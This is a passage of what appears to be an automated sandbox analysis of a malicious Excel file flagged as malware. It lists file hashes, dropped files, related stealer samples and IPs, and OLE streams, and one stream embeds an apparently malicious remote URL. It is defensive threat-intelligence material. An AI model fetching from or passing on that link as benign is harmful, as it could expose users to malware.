                                                                          • 3.39.89.152
                                                                          a0e9f5d64349fb13191bc781f81f42e1Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.67
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.246.67
                                                                          Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.67
                                                                          POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.67
                                                                          POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 13.107.246.67
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.246.67
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.246.67
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.246.67
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.246.67
                                                                          No context
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):118
                                                                          Entropy (8bit):3.5700810731231707
                                                                          Encrypted:false
                                                                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                          MD5:573220372DA4ED487441611079B623CD
                                                                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):934
                                                                          Entropy (8bit):2.7129194926077287
                                                                          Encrypted:false
                                                                          SSDEEP:24:YIrNvpCHhFGMfzLRwcftR/8AJp9WtAZRJ5poIHWPZqy:YmbCHaMfzLmcL8AJtfJ52IH2Zh
                                                                          MD5:AEA8676011F651E962233964C56EC078
                                                                          SHA1:48A16B5ED64B901BD474918730E8428101BCB382
                                                                          SHA-256:F66BFE3FB3CF9C5973527B3C6ED0927D4056DADF962D0B64B87FD97F852191F9
                                                                          SHA-512:76ED966584166233A500D2400C012929DC76D1DFF397C3A3D014FB7ECE767730966655974A3B1BE5B6E0C03CC21B3A38B3029916628DCC07D07CC1A8F7031748
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):512
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3::
                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):512
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3::
                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                          Malicious:false
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):512
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3::
                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                          Malicious:false
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 10 20:34:41 2025, Security: 1
                                                                          Category:dropped
                                                                          Size (bytes):299008
                                                                          Entropy (8bit):7.952990371906305
                                                                          Encrypted:false
                                                                          SSDEEP:6144:rAg+46GPLjsSPmpBY1+QnZeGVGpfRdH5aPcv2DFjLm6tT5zpo8:rpx6GzjX+kRndVGpQU+DZVtk8
                                                                          MD5:10DBB8A8D37A8D113F5CB5EF5DA7C50E
                                                                          SHA1:4E741DA5A167AB1A83D5E1133D86384C73A46706
                                                                          SHA-256:5FF4127FE5F7A8F873DA5A2732090EC58521DCB4603D440C64B86E9B6D10F49A
                                                                          SHA-512:FC4374A0DE882C06319BF5A8CFFFA978E14E3272F29D0677F6998EC53AE545AECF44BE7C9D4BD939372C17171C2852FEA1F83DBFC3EA8B001D45A161F3B96513
                                                                          Malicious:false
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:false
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 10 20:34:41 2025, Security: 1
                                                                          Category:dropped
                                                                          Size (bytes):299008
                                                                          Entropy (8bit):7.952990371906305
                                                                          Encrypted:false
                                                                          SSDEEP:6144:rAg+46GPLjsSPmpBY1+QnZeGVGpfRdH5aPcv2DFjLm6tT5zpo8:rpx6GzjX+kRndVGpQU+DZVtk8
                                                                          MD5:10DBB8A8D37A8D113F5CB5EF5DA7C50E
                                                                          SHA1:4E741DA5A167AB1A83D5E1133D86384C73A46706
                                                                          SHA-256:5FF4127FE5F7A8F873DA5A2732090EC58521DCB4603D440C64B86E9B6D10F49A
                                                                          SHA-512:FC4374A0DE882C06319BF5A8CFFFA978E14E3272F29D0677F6998EC53AE545AECF44BE7C9D4BD939372C17171C2852FEA1F83DBFC3EA8B001D45A161F3B96513
                                                                          Malicious:true
                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 10 13:36:05 2025, Security: 1
                                                                          Entropy (8bit):7.91074257209753
                                                                          TrID:
                                                                          • Microsoft Excel sheet (30009/1) 47.99%
                                                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                          File name:COTA#U00c7#U00c3O.xls
                                                                          File size:312'832 bytes
                                                                          MD5:3f6b0fddaa94e07440a3890afc3dc99c
                                                                          SHA1:2c963eb3944bc4be5892e6ef95283e2b8b9bcaf1
                                                                          SHA256:d4819f6ce1e7c5ed703e11e3ae98ebfb04abe95ac2a221bcc43696de923bdbb2
                                                                          SHA512:e6fd8fd6b2084fac40a1251d11ab8d9f504842494cbf95ebeaca743d26cf93122a4388c53bb01e146397951eb4220edb4bccddd0699b72469f2527d4c4f281d2
                                                                          SSDEEP:6144:mzVjj7rqy5w5lp5AOnXVlUUPgZXTJDyOJ8+dAyNRNR+sQ:6jj7rquwnp5xXFSTJN9dAyFZQ
                                                                          TLSH:8264122C34E5EB1ED6874A784CC1E6CA61B2FC63BE51B33B3191F74E0C7A1A19143966
                                                                          Icon Hash:35ed8e920e8c81b5
                                                                          Document Type:OLE
                                                                          Number of OLE Files:1
                                                                          Has Summary Info:
                                                                          Application Name:Microsoft Excel
                                                                          Encrypted Document:True
                                                                          Contains Word Document Stream:False
                                                                          Contains Workbook/Book Stream:True
                                                                          Contains PowerPoint Document Stream:False
                                                                          Contains Visio Document Stream:False
                                                                          Contains ObjectPool Stream:False
                                                                          Flash Objects Count:0
                                                                          Contains VBA Macros:True
                                                                          Code Page:1252
                                                                          Author:
                                                                          Last Saved By:
                                                                          Create Time:2006-09-16 00:00:00
                                                                          Last Saved Time:2025-03-10 13:36:05
                                                                          Creating Application:Microsoft Excel
                                                                          Security:1
                                                                          Document Code Page:1252
                                                                          Thumbnail Scaling Desired:False
                                                                          Contains Dirty Links:False
                                                                          Shared Document:False
                                                                          Changed Hyperlinks:False
                                                                          Application Version:786432
                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                          VBA File Name:Sheet1.cls
                                                                          Stream Size:977
                                                                          Attribute VB_Name = "Sheet1"
                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                          Attribute VB_GlobalNameSpace = False
                                                                          Attribute VB_Creatable = False
                                                                          Attribute VB_PredeclaredId = True
                                                                          Attribute VB_Exposed = True
                                                                          Attribute VB_TemplateDerived = False
                                                                          Attribute VB_Customizable = True
                                                                          

                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                          VBA File Name:Sheet2.cls
                                                                          Stream Size:977
                                                                          Attribute VB_Name = "Sheet2"
                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                          Attribute VB_GlobalNameSpace = False
                                                                          Attribute VB_Creatable = False
                                                                          Attribute VB_PredeclaredId = True
                                                                          Attribute VB_Exposed = True
                                                                          Attribute VB_TemplateDerived = False
                                                                          Attribute VB_Customizable = True
                                                                          

                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                          VBA File Name:Sheet3.cls
                                                                          Stream Size:977
                                                                          Attribute VB_Name = "Sheet3"
                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                          Attribute VB_GlobalNameSpace = False
                                                                          Attribute VB_Creatable = False
                                                                          Attribute VB_PredeclaredId = True
                                                                          Attribute VB_Exposed = True
                                                                          Attribute VB_TemplateDerived = False
                                                                          Attribute VB_Customizable = True
                                                                          

                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                          VBA File Name:ThisWorkbook.cls
                                                                          Stream Size:985
                                                                          Attribute VB_Name = "ThisWorkbook"
                                                                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                          Attribute VB_GlobalNameSpace = False
                                                                          Attribute VB_Creatable = False
                                                                          Attribute VB_PredeclaredId = True
                                                                          Attribute VB_Exposed = True
                                                                          Attribute VB_TemplateDerived = False
                                                                          Attribute VB_Customizable = True
                                                                          

                                                                          General
                                                                          Stream Path:\x1CompObj
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:114
                                                                          Entropy:4.25248375192737
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                          General
                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:244
                                                                          Entropy:2.889430592781307
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                          General
                                                                          Stream Path:\x5SummaryInformation
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:200
                                                                          Entropy:3.2920681057018664
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . P ; _ . . . . . . . . .
                                                                          General
                                                                          Stream Path:MBD006B2059/\x1CompObj
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:99
                                                                          Entropy:3.631242196770981
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                          General
                                                                          Stream Path:MBD006B2059/Package
                                                                          CLSID:
                                                                          File Type:Microsoft Excel 2007+
                                                                          Stream Size:9691
                                                                          Entropy:6.95011635744162
                                                                          Base64 Encoded:True
                                                                          General
                                                                          Stream Path:MBD006B205A/\x1Ole
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:792
                                                                          Entropy:5.096125582120635
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . 8 # b . . . . . . . . . . . . " . . . y . . . K . . . . . h . t . t . p . s . : . / . / . s . t . 3 . . . p . r . o . / . Y . j . z . N . w . p . D . ? . & . s . l . o . p . e . = . n . e . e . d . y . & . r . o . b . e . r . t . = . g . r . o . t . e . s . q . u . e . & . c . r . e . s . t . = . f . r . a . g . i . l . e . & . a . g . r . e . e . m . e . n . . . 0 7 s u B ' 4 > . . . O b < " z . . . @ ` e t m . _ . I ] H . ! . L c ^ C G H K A . . 5 . S < . . . . . 4 . , E # : . e u . o * . . . . .
                                                                          General
                                                                          Stream Path:Workbook
                                                                          CLSID:
                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                          Stream Size:286554
                                                                          Entropy:7.998368154313615
                                                                          Base64 Encoded:True
                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                          CLSID:
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Stream Size:525
                                                                          Entropy:5.25184623251135
                                                                          Base64 Encoded:True
                                                                          Data ASCII:I D = " { 7 3 7 C B F F C - 7 F F 9 - 4 2 8 2 - 9 C 3 0 - 5 0 9 4 0 5 F 5 0 4 8 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 3 F 1 2 2 A 9 8 9 A D 8 9 A D 8
                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:104
                                                                          Entropy:3.0488640812019017
                                                                          Base64 Encoded:False
                                                                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:2644
                                                                          Entropy:3.992761578606274
                                                                          Base64 Encoded:False
                                                                          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\